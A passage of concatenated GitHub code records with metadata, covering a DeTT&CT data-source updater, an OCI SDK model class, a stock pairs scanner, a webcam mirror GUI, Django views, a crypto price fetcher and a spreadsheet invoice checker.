json\n\nFILE_PATH_DETTECT_DS_XLSX = '../../../data/dettect_data_sources.xlsx'\nEXCEL_COLUMNS_OF_INTEREST = ['E', 'F', 'G', 'H']\nFILE_DATA_SOURCES_PLATFORMS = 'dettect_data_sources.json'\n\n\nclass DeTTECTDataSources():\n \"\"\"\n Update the mapping of techniques to DeTT&CT data sources ('dettect_data_sources.json')\n based on the content within 'dettect_data_sources.xlsx'.\n \"\"\"\n\n def __init__(self):\n self.excel_dict = self._create_dict_from_excel()\n\n def _create_dict_from_excel(self):\n \"\"\"\n Create a dictionary from the Excel file 'dettect_data_sources.xlsx' with the data we need.\n :return:\n \"\"\"\n excel_file = openpyxl.load_workbook(FILE_PATH_DETTECT_DS_XLSX)\n excel_sheet = excel_file['Techniques']\n\n excel_dict = {}\n\n row_idx = 2\n for _ in excel_sheet.iter_rows():\n tech_id = excel_sheet['A' + str(row_idx)].value\n if tech_id != None:\n excel_dict[tech_id] = []\n\n for c in EXCEL_COLUMNS_OF_INTEREST:\n cell_value = excel_sheet[c + str(row_idx)].value\n if cell_value:\n excel_dict[tech_id].append(excel_sheet[c + str(row_idx)].value)\n row_idx += 1\n\n return excel_dict\n\n def 
create_dettect_data_sources_json(self):\n \"\"\"\n Generate the content for the file 'dettect_data_sources.json' and write to disk.\n :return:\n \"\"\"\n ds_per_technique = []\n\n for k, v in self.excel_dict.items():\n tmp_d = {}\n tmp_d['technique_id'] = k\n\n # Make sure that Network Traffic Content is always shown last in the list\n # (also sort the DeTT&CT data sources)\n all_data_source_except = set(v).difference(['Network Traffic Content'])\n sorted_ds = [ds + ' [DeTT&CT data source]' for ds in sorted(list(all_data_source_except))] + \\\n [ds for ds in v if ds == 'Network Traffic Content']\n tmp_d['dettect_data_sources'] = sorted_ds\n\n ds_per_technique.append(tmp_d)\n\n # Write file to disk\n with open('../../../data/' + FILE_DATA_SOURCES_PLATFORMS, 'w') as f:\n json.dump(ds_per_technique, f, indent=2)\n return ds_per_technique\n\n\nif __name__ == \"__main__\":\n dettect_data_sources = DeTTECTDataSources()\n dettect_data_sources.create_dettect_data_sources_json()\n", "repo_name": "rabobank-cdc/DeTTECT", "sub_path": ".github/workflows/scripts/update_dettect_data_sources.py", "file_name": "update_dettect_data_sources.py", "file_ext": "py", "file_size_in_byte": 2442, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1865, "dataset": "github-code", "pt": "52", "api": [{"api_name": "openpyxl.load_workbook", "line_number": 23, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "31600407669", "text": "from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass OpsiDataObjectSummary(object):\n \"\"\"\n Summary of an OPSI data object.\n \"\"\"\n\n #: A constant which can be used with the data_object_type property of a OpsiDataObjectSummary.\n #: This constant has a value of \"DATABASE_INSIGHTS_DATA_OBJECT\"\n DATA_OBJECT_TYPE_DATABASE_INSIGHTS_DATA_OBJECT = \"DATABASE_INSIGHTS_DATA_OBJECT\"\n\n #: A constant which can be used with the data_object_type property of a OpsiDataObjectSummary.\n #: This constant has a value of \"HOST_INSIGHTS_DATA_OBJECT\"\n DATA_OBJECT_TYPE_HOST_INSIGHTS_DATA_OBJECT = \"HOST_INSIGHTS_DATA_OBJECT\"\n\n #: A constant which can be used with the data_object_type property of a OpsiDataObjectSummary.\n #: This constant has a value of \"EXADATA_INSIGHTS_DATA_OBJECT\"\n DATA_OBJECT_TYPE_EXADATA_INSIGHTS_DATA_OBJECT = \"EXADATA_INSIGHTS_DATA_OBJECT\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new OpsiDataObjectSummary object with values from keyword arguments. 
This class has the following subclasses and if you are using this class as input\n to a service operations then you should favor using a subclass over the base class:\n\n * :class:`~oci.opsi.models.HostInsightsDataObjectSummary`\n * :class:`~oci.opsi.models.DatabaseInsightsDataObjectSummary`\n * :class:`~oci.opsi.models.ExadataInsightsDataObjectSummary`\n\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param identifier:\n The value to assign to the identifier property of this OpsiDataObjectSummary.\n :type identifier: str\n\n :param data_object_type:\n The value to assign to the data_object_type property of this OpsiDataObjectSummary.\n Allowed values for this property are: \"DATABASE_INSIGHTS_DATA_OBJECT\", \"HOST_INSIGHTS_DATA_OBJECT\", \"EXADATA_INSIGHTS_DATA_OBJECT\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type data_object_type: str\n\n :param display_name:\n The value to assign to the display_name property of this OpsiDataObjectSummary.\n :type display_name: str\n\n :param description:\n The value to assign to the description property of this OpsiDataObjectSummary.\n :type description: str\n\n :param name:\n The value to assign to the name property of this OpsiDataObjectSummary.\n :type name: str\n\n :param group_names:\n The value to assign to the group_names property of this OpsiDataObjectSummary.\n :type group_names: list[str]\n\n \"\"\"\n self.swagger_types = {\n 'identifier': 'str',\n 'data_object_type': 'str',\n 'display_name': 'str',\n 'description': 'str',\n 'name': 'str',\n 'group_names': 'list[str]'\n }\n\n self.attribute_map = {\n 'identifier': 'identifier',\n 'data_object_type': 'dataObjectType',\n 'display_name': 'displayName',\n 'description': 'description',\n 'name': 'name',\n 'group_names': 'groupNames'\n }\n\n self._identifier = None\n self._data_object_type = None\n self._display_name = None\n self._description = None\n self._name = None\n self._group_names = None\n\n @staticmethod\n def get_subtype(object_dictionary):\n \"\"\"\n Given the hash representation of a subtype of this class,\n use the info in the hash to return the class of the subtype.\n \"\"\"\n type = object_dictionary['dataObjectType']\n\n if type == 'HOST_INSIGHTS_DATA_OBJECT':\n return 'HostInsightsDataObjectSummary'\n\n if type == 'DATABASE_INSIGHTS_DATA_OBJECT':\n return 'DatabaseInsightsDataObjectSummary'\n\n if type == 'EXADATA_INSIGHTS_DATA_OBJECT':\n return 'ExadataInsightsDataObjectSummary'\n else:\n return 'OpsiDataObjectSummary'\n\n @property\n def identifier(self):\n \"\"\"\n **[Required]** Gets the identifier of this OpsiDataObjectSummary.\n Unique identifier of OPSI data object.\n\n\n :return: The identifier of this OpsiDataObjectSummary.\n :rtype: str\n \"\"\"\n return self._identifier\n\n @identifier.setter\n def identifier(self, identifier):\n \"\"\"\n Sets the identifier of this OpsiDataObjectSummary.\n Unique identifier of OPSI data object.\n\n\n :param identifier: The identifier of this OpsiDataObjectSummary.\n :type: str\n \"\"\"\n self._identifier = identifier\n\n @property\n def data_object_type(self):\n \"\"\"\n **[Required]** Gets the data_object_type of this OpsiDataObjectSummary.\n Type of OPSI data object.\n\n Allowed values for this property are: \"DATABASE_INSIGHTS_DATA_OBJECT\", \"HOST_INSIGHTS_DATA_OBJECT\", \"EXADATA_INSIGHTS_DATA_OBJECT\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 
'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The data_object_type of this OpsiDataObjectSummary.\n :rtype: str\n \"\"\"\n return self._data_object_type\n\n @data_object_type.setter\n def data_object_type(self, data_object_type):\n \"\"\"\n Sets the data_object_type of this OpsiDataObjectSummary.\n Type of OPSI data object.\n\n\n :param data_object_type: The data_object_type of this OpsiDataObjectSummary.\n :type: str\n \"\"\"\n allowed_values = [\"DATABASE_INSIGHTS_DATA_OBJECT\", \"HOST_INSIGHTS_DATA_OBJECT\", \"EXADATA_INSIGHTS_DATA_OBJECT\"]\n if not value_allowed_none_or_none_sentinel(data_object_type, allowed_values):\n data_object_type = 'UNKNOWN_ENUM_VALUE'\n self._data_object_type = data_object_type\n\n @property\n def display_name(self):\n \"\"\"\n **[Required]** Gets the display_name of this OpsiDataObjectSummary.\n User-friendly name of OPSI data object.\n\n\n :return: The display_name of this OpsiDataObjectSummary.\n :rtype: str\n \"\"\"\n return self._display_name\n\n @display_name.setter\n def display_name(self, display_name):\n \"\"\"\n Sets the display_name of this OpsiDataObjectSummary.\n User-friendly name of OPSI data object.\n\n\n :param display_name: The display_name of this OpsiDataObjectSummary.\n :type: str\n \"\"\"\n self._display_name = display_name\n\n @property\n def description(self):\n \"\"\"\n Gets the description of this OpsiDataObjectSummary.\n Description of OPSI data object.\n\n\n :return: The description of this OpsiDataObjectSummary.\n :rtype: str\n \"\"\"\n return self._description\n\n @description.setter\n def description(self, description):\n \"\"\"\n Sets the description of this OpsiDataObjectSummary.\n Description of OPSI data object.\n\n\n :param description: The description of this OpsiDataObjectSummary.\n :type: str\n \"\"\"\n self._description = description\n\n @property\n def name(self):\n \"\"\"\n Gets the name of this OpsiDataObjectSummary.\n Name of the data object, which can be used in data object queries just like how view names are used in a query.\n\n\n :return: The name of this OpsiDataObjectSummary.\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"\n Sets the name of this OpsiDataObjectSummary.\n Name of the data object, which can be used in data object queries just like how view names are used in a query.\n\n\n :param name: The name of this OpsiDataObjectSummary.\n :type: str\n \"\"\"\n self._name = name\n\n @property\n def group_names(self):\n \"\"\"\n Gets the group_names of this OpsiDataObjectSummary.\n Names of all the groups to which the data object belongs to.\n\n\n :return: The group_names of this OpsiDataObjectSummary.\n :rtype: list[str]\n \"\"\"\n return self._group_names\n\n @group_names.setter\n def group_names(self, group_names):\n \"\"\"\n Sets the group_names of this OpsiDataObjectSummary.\n Names of all the groups to which the data object belongs to.\n\n\n :param group_names: The group_names of this OpsiDataObjectSummary.\n :type: list[str]\n \"\"\"\n self._group_names = group_names\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n", "repo_name": "oracle/oci-python-sdk", "sub_path": "src/oci/opsi/models/opsi_data_object_summary.py", "file_name": "opsi_data_object_summary.py", "file_ext": "py", "file_size_in_byte": 8911, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 345, "dataset": 
"github-code", "pt": "52", "api": [{"api_name": "oci.util.value_allowed_none_or_none_sentinel", "line_number": 155, "usage_type": "call"}, {"api_name": "oci.util.formatted_flat_dict", "line_number": 256, "usage_type": "call"}, {"api_name": "oci.decorators.init_model_state_from_kwargs", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "14440098824", "text": "# 95 pct dates are stationary\n# 95 pct threshold\n# Ergodic Theorem\nimport time\nimport warnings\nfrom tqdm.auto import tqdm\nfrom statsmodels.tsa.vector_ar.vecm import coint_johansen\nimport matplotlib.pyplot as plt\nimport math\nfrom pandas_datareader import data as wb\nimport numpy as np\nimport pandas as pd\nfrom inspect import trace\nimport multiprocessing as mp\nimport yfinance as yf\nyf.pdr_override()\nwarnings.filterwarnings('ignore')\n\npairs_info = pd.DataFrame(\n columns=['symb1', 'symb2', 'coef1', 'coef2', 'direction'])\n\n\ndef statsGen(data):\n\n adjClose = data.iloc[:, :2]\n result = coint_johansen(adjClose, det_order=0, k_ar_diff=1)\n\n return result.lr1, result.cvt, result.lr2, result.cvm, result.evec\n\n\ndef signalgenerator(row):\n\n symb1 = row['symb1']\n symb2 = row['symb2']\n pair = (symb1, symb2)\n\n data = wb.get_data_yahoo(pair)[['Adj Close', 'Volume']]\n\n data = data.dropna()\n\n data[f'coef_{pair[0]}'] = None\n data[f'coef_{pair[1]}'] = None\n data['portfolio'] = None\n\n for i in tqdm(range(50, len(data))):\n try:\n evec = statsGen(data.iloc[:i+1, :])[4][0]\n coef1 = evec[0]\n coef2 = evec[1]\n data.iloc[i, -3] = coef1\n data.iloc[i, -2] = coef2\n\n if i != len(data)-1:\n data.iloc[i+1, -1] = coef1 * \\\n data.iloc[i, 0] + coef2 * data.iloc[i, 1]\n except:\n pass\n\n adjdata = data.dropna()\n\n historical = adjdata.iloc[:-1, :]\n today_value = adjdata.iloc[-1, -1]\n\n above = historical[historical['portfolio'] >=\n today_value].shape[0] / historical.shape[0]\n below = historical[historical['portfolio'] <=\n today_value].shape[0] / historical.shape[0]\n\n historica_volume = historical['Volume'].mean()\n\n if above < 0.025 and historica_volume[0] > 3500000 and historica_volume[1] > 3500000:\n return {'symb1': symb1, 'symb2': symb2,\n 'coef1': adjdata.iloc[-1, -3], 'coef2': adjdata.iloc[-1, -2], 'direction': 'Short'}\n elif below < 0.025 and historica_volume[0] > 3500000 and historica_volume[1] > 3500000:\n return {'symb1': symb1, 'symb2': symb2,\n 'coef1': adjdata.iloc[-1, -3], 'coef2': adjdata.iloc[-1, -2], 'direction': 'Long'}\n else:\n return None\n\n\ncombined = pd.DataFrame()\nfor j in range(0, 1):\n data = pd.read_csv('cointegrated_pairs_{}.csv'.format(j))\n combined = combined.append(data, ignore_index=True)\n\n\nif __name__ == '__main__':\n \n start_time = time.time()\n\n results = []\n with mp.Pool(mp.cpu_count()) as pool:\n\n for i in tqdm(range(combined.shape[0])):\n results.append(pool.apply_async(\n signalgenerator, args=(combined.iloc[i, :],)))\n for result in results:\n if result.get() != None:\n pairs_info = pairs_info.append(result.get(), ignore_index=True)\n pool.close()\n pool.join()\n\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n", "repo_name": "LightFormingAGC/Stock_Prediction", "sub_path": "Mean_Reverting/pairsscanner.py", "file_name": "pairsscanner.py", "file_ext": "py", "file_size_in_byte": 3016, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "yfinance.pdr_override", "line_number": 16, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 17, "usage_type": 
"call"}, {"api_name": "pandas.DataFrame", "line_number": 19, "usage_type": "call"}, {"api_name": "statsmodels.tsa.vector_ar.vecm.coint_johansen", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas_datareader.data.get_data_yahoo", "line_number": 37, "usage_type": "call"}, {"api_name": "pandas_datareader.data", "line_number": 37, "usage_type": "name"}, {"api_name": "tqdm.auto.tqdm", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 81, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 83, "usage_type": "call"}, {"api_name": "time.time", "line_number": 89, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 92, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 92, "usage_type": "call"}, {"api_name": "tqdm.auto.tqdm", "line_number": 94, "usage_type": "call"}, {"api_name": "time.time", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "69841642084", "text": "\"\"\"\nCreated on 22 January 2022\nName: Mirror.py\nAuthor: Jake Grosse\nDescription: A Python GUI which creates a mirror for the user to see themselves in.\n\nCitation: The following link was used to consult few things at the end as I discovered that, of course,\n someone had thought of this exact idea and made a webcam photo booth. The project has been a\n process of revision and redesign, going from a game manual, to a Rick-Roll, now to a\n mirror. I found the CV2 library a few days ago and PIL and tk are standard.\n\n I looked to the internet for help with tkinter labels to properly format images from CV2 inputs\n and to see how other people handled color. I found both in one link with a very similar\n format to my own code. I will sign a sheet of paper that says that I wrote everything except\n that which is cited as not written by me. I promise you I did write most of this before looking\n online at this detailed project.\n https://solarianprogrammer.com/2018/04/21/python-opencv-show-video-tkinter-window/\n This link is referred to as SOLARIAN from here on out so I don't have to make the code ugly with links.\n I realize that this link has other features which I do not, but I wasn't going to write it off as my own\n nor was I going to get the deduction for citing huge portions of code. Therefore, we have a mirror and not\n a camera booth. 
It is referenced in two places in this file.\n\"\"\"\n\n# import GUI container/utility (tkinter)\nimport tkinter as tk\n# import threads to use for streaming video\nimport threading as td\n# import open computer vision library\nimport cv2\n# import pillow image handling objects\nfrom PIL import Image, ImageTk\n\n\n# a class extending tkinter.Tk which holds a place for a webcam input\nclass Mirror(tk.Tk):\n def __init__(self, title, geom=\"1280x720\"):\n # initialize superclass tk window\n tk.Tk.__init__(self)\n # change the tkinter title\n self.title(title)\n # change the tkinter geometry\n self.geometry(geom)\n # background color change\n self.configure(bg=\"grey\")\n\n # delay wait time as I found was needed for an update or it would literally just freeze\n # incorporated in the update method using tk.after in relation to self\n self.wait_time_ms = 15\n\n # get video opened to use (zero is the primary webcam source)\n self.video = VideoRecorder(0)\n # wiki says canvas is better than frame for images\n # make a canvas to output video to, but labels\n # don't flicker when updating several times per second\n self.lbl = tk.Label(self, width=1200, height=720)\n self.lbl.pack()\n\n # creating a thread to run the video otherwise the window never opens\n self.video_thread = td.Thread(target=self.stream)\n # daemon thread\n self.video_thread.daemon = 1\n # start the video stream\n self.video_thread.start()\n\n # disallow the window from being resized so we don't have extra movement with the camera not scaling\n self.resizable(0, 0)\n\n self.mainloop()\n\n # stream the webcam input to the associated label on the \"Mirror\"\n def stream(self):\n # display video\n while self.video.isOpened():\n # capture frame from video\n returned_frame, frame = self.video.read()\n if returned_frame:\n # FROM SOLARION, second parameter was copy pasted, the rest was hand typed\n temp_image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n vp_dims = self.video.get_geom()\n # FROM SOLARION, the use of fromarray is being cited to solve a problem\n # transpose just flips from left to right\n # Resize just doubles the viewport dimensions so that the image fills most of the screen\n self.photo = ImageTk.PhotoImage(image=Image.fromarray(temp_image).transpose(method=Image.FLIP_LEFT_RIGHT).resize((2*vp_dims[0], 2*vp_dims[1])))\n\n # set label image to the selected photo (credit Ted for teaching this)\n self.lbl.configure(image=self.photo)\n self.lbl.image = self.photo\n # delay in updates so that the computer isn't fully consumed by processing individual images\n cv2.waitKey(self.wait_time_ms)\n\n\n# a class responsible for capturing and handling the dimensions and release of video resources\nclass VideoRecorder(cv2.VideoCapture):\n def __init__(self, source):\n cv2.VideoCapture.__init__(self, source)\n # setting viewport width and height in pixels\n # commands found in documentation https://docs.opencv.org/4.x/index.html\n self.vp_width = self.get(cv2.CAP_PROP_FRAME_WIDTH)\n self.vp_height = self.get(cv2.CAP_PROP_FRAME_HEIGHT)\n\n # when the object is deleted, see if the video is active and if it is then release the video device\n def __del__(self):\n if self.isOpened():\n self.release()\n\n # returns a list of the viewport dimensions in pixels of the camera\n def get_geom(self):\n # cast to integers because they default to float values\n return [int(self.vp_width), int(self.vp_height)]\n\n", "repo_name": "jgrosse01/CS495_MagicMirror_PyGUIProject", "sub_path": "GUI/Mirror.py", "file_name": "Mirror.py", "file_ext": "py", 
"file_size_in_byte": 5273, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tkinter.Tk", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tkinter.Tk.__init__", "line_number": 38, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 55, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 78, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 83, "usage_type": "name"}, {"api_name": "PIL.Image.fromarray", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 83, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_LEFT_RIGHT", "line_number": 83, "usage_type": "attribute"}, {"api_name": "cv2.waitKey", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 93, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture.__init__", "line_number": 95, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 95, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 98, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 99, "usage_type": "attribute"}]} +{"seq_id": "39457308556", "text": "from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User, auth\nfrom django.contrib import messages\nfrom django.template import loader, Context\nfrom django.http import HttpResponse\nimport logging\n\nfrom . models import Userprofile\n\nlogging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'console': {\n 'format': '%(name)-12s %(levelname)-8s %(message)s'\n },\n 'file': {\n 'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'\n }\n },\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'console'\n },\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'formatter': 'file',\n 'filename': '/tmp/debug.log'\n }\n },\n 'loggers': {\n '': {\n 'level': 'DEBUG',\n 'handlers': ['console', 'file']\n }\n }\n})\n\nlogger = logging.getLogger(__name__)\n\n# Create your views here.\n@login_required(login_url=\"login\")\ndef index(request):\n return redirect('/core/dashboard.html')\n\n@login_required(login_url=\"login\")\ndef dashboard(request):\n return redirect('/core/dashboard.html')\n\n@login_required(login_url=\"login\")\ndef pages(request):\n \n context = dict({'user_data': Userprofile.objects.all()})\n # All resource paths end in .html.\n # Pick out the html file name from the url. 
And load that template.\n data = Userprofile.objects.get(user_id=request.user.id)\n # logger.info()\n try:\n load_template = request.path.split('/')[-1]\n # template = loader.get_template('core/' + load_template)\n # return HttpResponse(template.render(context, request))\n # return render(request, 'core/' + load_template, {'user_data': user_data[0]})\n return render(request, 'core/' + load_template, {'profile': data})\n except:\n return render(request, '/')\n\n@login_required(login_url=\"login\")\ndef updest(request):\n messages.info(request, '')\n context = {\n 'output' : False,\n 'message' : 'Invalid Credentials'\n }\n if request.method == 'POST':\n company = request.POST['company']\n firstname = request.POST['firstname']\n lastname = request.POST['lastname']\n email = request.POST['email']\n address = request.POST['address']\n aboutme = request.POST['aboutme']\n\n usr, boolCreated = Userprofile.objects.update_or_create(user_id=request.user.id, defaults={'company': company, 'address': address, 'about': aboutme})\n\n if boolCreated:\n messages.info(request, 'Something went wrong, try again!')\n else:\n messages.info(request, 'Profile Updated!')\n\n return redirect('./user.html')\n else:\n return redirect('./user.html')\n", "repo_name": "Liopun/djashboard", "sub_path": "app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2905, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.config.dictConfig", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.config", "line_number": 11, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 42, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 47, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 45, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 51, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 49, "usage_type": "call"}, {"api_name": "models.Userprofile.objects.all", "line_number": 56, "usage_type": "call"}, {"api_name": "models.Userprofile.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "models.Userprofile", "line_number": 56, "usage_type": "name"}, {"api_name": "models.Userprofile.objects.get", "line_number": 59, "usage_type": "call"}, {"api_name": "models.Userprofile.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "models.Userprofile", "line_number": 59, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 66, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 68, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 53, "usage_type": "call"}, {"api_name": "django.contrib.messages.info", "line_number": 72, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 72, "usage_type": "name"}, {"api_name": "models.Userprofile.objects.update_or_create", "line_number": 85, "usage_type": "call"}, {"api_name": "models.Userprofile.objects", "line_number": 85, "usage_type": "attribute"}, {"api_name": "models.Userprofile", "line_number": 85, "usage_type": "name"}, {"api_name": "django.contrib.messages.info", "line_number": 88, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 88, "usage_type": "name"}, {"api_name": "django.contrib.messages.info", "line_number": 
90, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 90, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 92, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 94, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "9876944144", "text": "import requests\n\ndef get_health_value(account: str) -> str:\n url = 'https://api.debank.com/portfolio/project_list?user_addr=' + account\n response = requests.get(url)\n\n if response.ok:\n dict = response.json()\n data = dict['data']\n for x in data:\n if x['id'] == 'bsc_venus':\n health_value = x['portfolio_item_list'][0]['detail']['health_rate']\n return round(health_value, 2)\n\n else:\n print('Error:', response.status_code)\n \n \ndef get_price(ticker: str):\n url = 'https://api.binance.com/api/v3/ticker/price?symbol=' + ticker.upper()\n response = requests.get(url)\n \n if response.ok:\n dict = response.json()\n return dict['price']\n \n else:\n print('Error:', response.status_code)\n ", "repo_name": "vernonwhy/telegram-portfolio-bot", "sub_path": "request_service.py", "file_name": "request_service.py", "file_ext": "py", "file_size_in_byte": 811, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 5, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "10334055929", "text": "import gspread\nfrom google.oauth2.service_account import Credentials\nfrom datetime import datetime\n\nSCOPE = [\n \"https://www.googleapis.com/auth/spreadsheets\",\n \"https://www.googleapis.com/auth/drive.file\",\n \"https://www.googleapis.com/auth/drive\"\n]\n\nCREDS = Credentials.from_service_account_file('creds.json')\nSCOPED_CREDS = CREDS.with_scopes(SCOPE)\nGSPREAD_CLIENT = gspread.authorize(SCOPED_CREDS)\nspreadsheet = GSPREAD_CLIENT.open('LPFMWFY23')\n\nlpf_sheet = spreadsheet.worksheet('LPF')\napproved_sheet = spreadsheet.worksheet('Approved')\nrejected_sheet = spreadsheet.worksheet('Rejected')\n\n\ndef query_item_price_and_buyer(invoice_date, item_code, site):\n formatted_date = datetime.strptime(\n invoice_date, '%d/%m/%Y').strftime('%b-%y')\n data = lpf_sheet.get_all_records()\n\n item_found = False\n buyer = None\n price_from_lpf = None\n\n for entry in data:\n if entry['ItemCode'] == item_code and entry['Site'] == site:\n price = entry.get(formatted_date)\n price_from_lpf = price\n buyer = entry.get('Buyer')\n if price:\n item_found = True\n return price, buyer, price_from_lpf\n if not item_found:\n return None, None, None\n return None, None, None\n\n\ndef push_to_approved_sheet(invoice_date, item_code, site, invoice_price, system_price, document_reference, buyer, price_from_lpf, price_variance):\n status = \"Approved - please pay\"\n row = [invoice_date, document_reference, item_code, site, invoice_price,\n system_price, price_from_lpf, price_variance, buyer, status]\n approved_sheet.append_rows([row])\n print(\"Succesfully added to the approved log.\")\n\n\ndef push_to_rejected_sheet(invoice_date, item_code, site, invoice_price, system_price, document_reference, buyer, price_from_lpf, price_variance):\n status = \"Rejected - please request credit from the supplier\"\n row = [invoice_date, document_reference, item_code, site, invoice_price,\n system_price, price_from_lpf, price_variance, buyer, status]\n 
rejected_sheet.append_rows([row])\n print(\"Succesfully added to the rejected log.\")\n\n\ndef create_rejected_invoices_report():\n while True:\n print(\"\\n=== Enter Invoice Details ===\")\n invoice_date = input(\"Enter invoice date (dd/mm/yyyy): \\n\")\n document_reference = input(\"Enter document reference: \\n\")\n item_code = input(\"Enter item code: \\n\").upper()\n site_input = input(\"Enter site: \\n\").upper()\n site = \"MW\" if site_input == \"MW\" else \"MANTON WOOD\"\n invoice_price = get_valid_numbers(\"Enter invoice price: \\n\")\n system_price = get_valid_numbers(\"Enter system price: \\n\")\n price_variance = get_valid_numbers(\"Variance to PO (£): \\n\")\n\n correct_details = input(\"Are the details correct? (yes/no): \\n\")\n if correct_details.lower() != 'yes':\n break\n\n price, buyer, price_from_lpf = query_item_price_and_buyer(\n invoice_date, item_code, site)\n\n print(\"\\n=== Report Results ===\")\n if price is not None:\n if abs(float(invoice_price) - float(price)) <= 0.01:\n push_to_approved_sheet(invoice_date, item_code, site, invoice_price,\n system_price, document_reference, buyer, price_from_lpf, price_variance)\n print(\"Invoice Approved, please pay\")\n print(\"Invoice Date:\", invoice_date)\n print(\"Document Reference:\", document_reference)\n print(\"Item Code:\", item_code)\n print(\"Site:\", site)\n print(\"Invoice Price\", invoice_price)\n print(\"System Price\", system_price)\n print(\"Price from LPF:\", price_from_lpf)\n print(\"Variance to PO (£):\", price_variance)\n print(\"Buyer\", buyer)\n\n else:\n push_to_rejected_sheet(invoice_date, item_code, site, invoice_price,\n system_price, document_reference, buyer, price_from_lpf, price_variance)\n print(\"Invoice Rejected. Please request credit\")\n print(\"Invoice Date:\", invoice_date)\n print(\"Document Reference:\", document_reference)\n print(\"Item Code:\", item_code)\n print(\"Site:\", site)\n print(\"Invoice Price\", invoice_price)\n print(\"System Price\", system_price)\n print(\"Price from LPF:\", price_from_lpf)\n print(\"Variance to PO (£):\", price_variance)\n print(\"Buyer\", buyer)\n\n continue_input = input(\n \"Do you want to submit another invoice? 
